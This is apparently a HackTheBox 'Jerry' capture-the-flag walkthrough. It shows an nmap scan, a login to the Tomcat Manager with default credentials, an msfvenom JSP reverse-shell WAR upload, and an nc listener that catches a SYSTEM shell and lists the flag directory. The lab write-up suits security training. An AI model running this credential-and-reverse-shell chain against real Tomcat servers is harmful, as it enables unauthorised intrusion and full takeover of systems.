hackthebox jerry walkthrough

Starting with nmap

# nmap -sC -sV 10.10.10.95 -oA jerry
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 04:02 EDT
Nmap scan report for 10.10.10.95
Host is up (0.16s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.45 seconds

We have only port 8080 open with Tomcat

hackthebox – jerry – tomcat

Click on Manager App

hackthebox – jerry – tomcat manager

Use default credentials tomcat/s3cret

We will create a war file and try to get a shell

# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.44 LPORT=4444 -f war > shell.war
Payload size: 1096 bytes
Final size of war file: 1096 bytes

Upload it from manager and access it http://10.10.10.95:8080/shell/

We will get the shell

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

We can now read the flag

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,601,879,040 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"

Leave a Reply

Your email address will not be published. Required fields are marked *